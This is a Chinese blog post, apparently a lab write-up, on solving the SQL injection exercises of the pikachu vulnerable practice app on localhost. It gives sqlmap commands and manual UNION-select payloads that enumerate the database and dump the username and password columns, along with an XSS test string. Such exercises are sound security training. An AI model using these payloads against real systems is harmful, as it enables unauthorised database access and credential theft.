

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Sinky">
  <meta name="keywords" content="">
  
    <meta name="description" content="概述数据库注入漏洞 SQL注入漏洞形成原因：在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到sql语句中后，被当作sql语句的一部分执行，从而导致数据库受损（被脱库、被删除、甚至整个服务器权限沦陷）防止SQL注入漏洞的策略： 1、对传进SQL语句里面的变量进行过滤，不允许危险字符传入 2、使用参数化（Parameterized Query 或 Paramete">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu-SQL注入">
<meta property="og:url" content="https://sinky.top/2022/08/14/pikachu-SQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Sinky&#39;s Blog">
<meta property="og:description" content="概述数据库注入漏洞 SQL注入漏洞形成原因：在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到sql语句中后，被当作sql语句的一部分执行，从而导致数据库受损（被脱库、被删除、甚至整个服务器权限沦陷）防止SQL注入漏洞的策略： 1、对传进SQL语句里面的变量进行过滤，不允许危险字符传入 2、使用参数化（Parameterized Query 或 Paramete">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/OxedYC8Z3TW6mhi.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/OcN91PyeLSb6dZ2.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/Z5tUei9paG8COwq.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/HGPmW5npascRi78.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/gzPAj4DCbM7aeX5.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/Mb1gFvQZJKzuoPj.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/1woM6UtT2yZej4v.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/zGdbRT8eLB5uE2q.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/YCWcI9t8lphZfLj.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/oMtHBAC7XWPq5Os.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/e9CPAYrHTNyW7fg.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/11/jImLuBZw6kV9oHe.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/ns6cb125QWuw4K8.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/83clNIzeqxQC95R.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/sjbvRBf8hX9Trik.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/cVtYLA9HiWvgpKN.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/DHQ1uVzSeAFW62K.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/tj3gv96SDb1eVN7.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/cenBE4stSj1IKx7.png">
<meta property="og:image" content="https://s2.loli.net/2022/08/12/ZAs93zclEUeLY1q.png">
<meta property="article:published_time" content="2022-08-14T02:39:51.516Z">
<meta property="article:modified_time" content="2022-08-14T02:41:34.723Z">
<meta property="article:author" content="Sinky">
<meta property="article:tag" content="pikachu">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://s2.loli.net/2022/08/11/OxedYC8Z3TW6mhi.png">
  
  
  
  <title>pikachu-SQL注入 - Sinky&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"sinky.top","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.2.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Sinky's Blog" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Sinky</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pikachu-SQL注入"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-08-14 10:39" pubdate>
          August 14, 2022 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.1k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          35 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">pikachu-SQL注入</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>数据库注入漏洞</p>
<p>SQL注入漏洞形成原因：在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到sql语句中后，被当作sql语句的一部分执行，从而导致数据库受损（被脱库、被删除、甚至整个服务器权限沦陷）防止SQL注入漏洞的策略：</p>
<p>1、对传进SQL语句里面的变量进行过滤，不允许危险字符传入</p>
<p>2、使用参数化（Parameterized Query 或 Parameterized Statement）</p>
<h1 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h1><p><img src="https://s2.loli.net/2022/08/11/OxedYC8Z3TW6mhi.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>随便提交，抓包可知，是post方式提交的参数为</p>
<pre><code class="hljs">id=2&amp;submit=%E6%9F%A5%E8%AF%A2
</code></pre>
<p>使用sqlmap跑post方式时的格式为：</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "&lt;url&gt;" ‐‐data="&lt;post提交的参数&gt;" ‐&lt;参数&gt;
</code></pre>
<p>1、使用sqlmap跑数据库</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_id.php" ‐‐data="id=2&amp;submit=%E6%9F%A5%E8%AF%A2" ‐f ‐‐dbms mysql ‐‐dbs ‐‐batch
</code></pre>
<p>注释：</p>
<ul>
<li>‐‐dbms 探测数据库是什么 ‐‐dbms mysql 指定数据库类型为mysql数据库</li>
<li>‐‐dbs 当用户有权读取时，列出所有的数据库</li>
<li>‐‐batch 该参数使用后不需要用户输入，将会使用sqlmap给的默认提示走下去</li>
</ul>
<p><img src="https://s2.loli.net/2022/08/11/OcN91PyeLSb6dZ2.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>2、查数据库pikachu下的表</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_id.php" ‐‐data="id=2&amp;submit=%E6%9F%A5%E8%AF%A2" ‐f ‐‐dbms mysql ‐D pikachu ‐‐tables ‐‐batch
</code></pre>
<p>注释：</p>
<ul>
<li>‐D pikachu 指定数据库pikachu</li>
<li>‐‐tables 当有权限读取pikachu数据库中的表tables时，读取出表</li>
</ul>
<p><img src="https://s2.loli.net/2022/08/11/Z5tUei9paG8COwq.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>3、获取表users中的列</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_id.php" ‐‐data="id=2&amp;submit=%E6%9F%A5%E8%AF%A2" ‐f ‐‐dbms mysql ‐D pikachu ‐T users ‐‐columns ‐‐batch
</code></pre>
<p>注释：</p>
<ul>
<li>‐T users 指定表明users</li>
<li>‐‐colmns 当有权限读取表users中的列的时候读取表users中的列。</li>
<li><img src="https://s2.loli.net/2022/08/11/HGPmW5npascRi78.png" srcset="/img/loading.gif" lazyload alt="图片.png"></li>
</ul>
<p>4、获取列username和password中的字段内容</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_id.php" ‐‐data="id=2&amp;submit=%E6%9F%A5%E8%AF%A2" ‐f ‐‐dbms mysql ‐D pikachu ‐T users ‐C username,password ‐‐dump ‐‐batch
</code></pre>
<p>注释：</p>
<ul>
<li>‐C username,password 指定读取列username和password中的字段内容</li>
<li>‐‐dump 抛出前面指定内容</li>
</ul>
<p><img src="https://s2.loli.net/2022/08/11/gzPAj4DCbM7aeX5.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h1><p>1、提交，抓包</p>
<p>2、提交恒等语句可以查询到所有的数据信息</p>
<p><img src="https://s2.loli.net/2022/08/11/Mb1gFvQZJKzuoPj.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h1><p><img src="https://s2.loli.net/2022/08/11/1woM6UtT2yZej4v.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="https://s2.loli.net/2022/08/11/zGdbRT8eLB5uE2q.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>GET方法取表，抓包：</p>
<p><img src="https://s2.loli.net/2022/08/11/YCWcI9t8lphZfLj.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>参数返回：<code> GET /pikachu/vul/sqli/sqli_str.php?name=&amp;submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1</code></p>
<p>使用sqlmap跑：</p>
<p>1、查数据库</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2" ‐‐dbms mysql ‐‐dbs 
</code></pre>
<p><img src="https://s2.loli.net/2022/08/11/oMtHBAC7XWPq5Os.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>2、查表</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2" ‐‐dbms mysql ‐‐dbs ‐‐batch
</code></pre>
<p><img src="https://s2.loli.net/2022/08/11/e9CPAYrHTNyW7fg.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>3、查列</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2" ‐‐dbms mysql ‐D pikachu ‐T users ‐‐columns ‐‐batch
</code></pre>
<p><img src="https://s2.loli.net/2022/08/11/jImLuBZw6kV9oHe.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>4、查字段</p>
<pre><code class="hljs">python2 sqlmap.py ‐u "http://localhost/pikachu/vul/sqli/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2" ‐‐dbms mysql ‐D pikachu ‐T users ‐C username,password ‐‐dump ‐‐batch
</code></pre>
<p><img src="https://s2.loli.net/2022/08/12/ns6cb125QWuw4K8.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a>搜索型注入</h1><p>为方便用户，提供搜索功能，但是因为没对变量过滤，导致漏洞，分为post get，get型一般用在网站上的搜索，post用于用户名登录，搜索型注入又称文本框注入</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><pre><code class="hljs">$sql="select * from user where password like '%$pwd%' order by password";
</code></pre>
<p>%匹配任何字符，这句sql语句就是基于用户输入的pws在users表中找到相应的password。</p>
<p>如果用户端输入: <code>and 1=1 and '%'=</code><br>则会变成：</p>
<pre><code class="hljs">$sql="select * from user where password like '%fendo'and 1=1 and '%'='%' order by password";
</code></pre>
<p>存在sql注入。<br>题</p>
<p><img src="https://s2.loli.net/2022/08/12/83clNIzeqxQC95R.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>输入一个单引号’</p>
<p><img src="https://s2.loli.net/2022/08/12/sjbvRBf8hX9Trik.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>报错，因为单引号导致语句%’没闭合。</p>
<p>输入 <code>'and 1=1 and '%'='</code> ,此时语句变为：</p>
<pre><code class="hljs">'%' and 1=1 and '%'='%' order by password
</code></pre>
<p><img src="https://s2.loli.net/2022/08/12/cVtYLA9HiWvgpKN.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>还可以：</p>
<ul>
<li>%’ and 1=1‐‐’</li>
<li>‘ and 1=1#</li>
<li>%’ and 1=1 and ‘%’=’</li>
</ul>
<p>可输入 <code>' and 1=1 order by x# </code>通过order by x 确定字段数，输入<code>' and 1=1 order by 3#</code>返回正常页面</p>
<p>输入<code>order by 4#</code>返回报错，说明字段数为3.</p>
<p>输入 <code>%' and 1=2 union select 1,2,3#</code></p>
<p><img src="https://s2.loli.net/2022/08/12/DHQ1uVzSeAFW62K.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>（1）1，2，3都可以回显，输入 %’ and 1=2 union select 1,2,(database())# 可爆出当前使用数据库pikachu</p>
<p>（2）输入 %’ and 1=2 union select 1,2,table_name from information_schema.columns where table_schema=’pikachu’# 得到<br>pikachu数据库下所有表名。</p>
<p>（3）选择users表，输入 %’ and 1=2 union select 1,2,column_name from information_schema.columns where table_name=’users’# 得到users表下的所有字段名</p>
<p>（4）输入 %’ and 1=2 union select 1,2,username from pikachu.users#</p>
<p>(顶多跟着网上教程做了一遍，挺懵逼的其实。–2020.1.7)</p>
<h1 id="xx型注入"><a href="#xx型注入" class="headerlink" title="xx型注入"></a>xx型注入</h1><p>xx型注入是什么鬼，看到提示笑死</p>
<p><img src="https://s2.loli.net/2022/08/12/tj3gv96SDb1eVN7.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>随便输入字符抓个包，是GET型请求，输入特殊字符<code>'"&lt;&gt;666</code>,回显报错.</p>
<p>尝试闭合一下：<code> #'&gt; &lt;script&gt;alert("XSS")&lt;/script&gt;</code></p>
<p>哎嗨！成功弹出xss，我真是进步了。</p>
<p>差点忘记这是sql注入了，输入一下万能恒等式：<code> ' and 1=1 '%'='</code></p>
<p>回显报错，有戏，但是接下来要怎么构造呢？我先看一下前端代码吧。这是从url那个name去获取到输入的，前端代码没啥用，我去看一下后台吧。</p>
<p><img src="https://s2.loli.net/2022/08/12/cenBE4stSj1IKx7.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>应该是这里了，分析一下，没看懂，注意到那个$query后面的一串字符串，尝试了几个，失败，果断不浪费时间找wp<br>吧。</p>
<p>1、传输方式为get，传输参数为<code> name=a&amp;submit=%E6%9F%A5%E8%AF%A</code></p>
<p>2、测试使其闭合的符号：’ ” &lt;&gt;&amp; –+<br>单引号会报错，初步推测使用单引号使其闭合</p>
<p>3、利用联合查询：<code> a') union select 1,2#</code></p>
<p>爆出数据库名字：<code> a') union select database(),2 #</code></p>
<p>爆出<br>users：<code> a') union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu' #</code></p>
<p>查</p>
<p>列：<code> a') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #</code></p>
<p>查字段：<code> a') union select 1,concat(username,password) from pikachu.users #</code></p>
<p><img src="https://s2.loli.net/2022/08/12/ZAs93zclEUeLY1q.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="quot-insert-update-quot-注入"><a href="#quot-insert-update-quot-注入" class="headerlink" title="&quot;insert/update&quot;注入"></a><code>"insert/update"</code>注入</h1>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pikachu/">#pikachu</a>
      
        <a href="/tags/WEB/">#WEB</a>
      
        <a href="/tags/SQL%E6%B3%A8%E5%85%A5/">#SQL注入</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pikachu-SQL注入</div>
      <div>https://sinky.top/2022/08/14/pikachu-SQL注入/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>Sinky</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>August 14, 2022</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>Licensed under</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/08/13/python%E5%AD%A6%E4%B9%A02/" title="Python学习2">
                        <span class="hidden-mobile">Python学习2</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
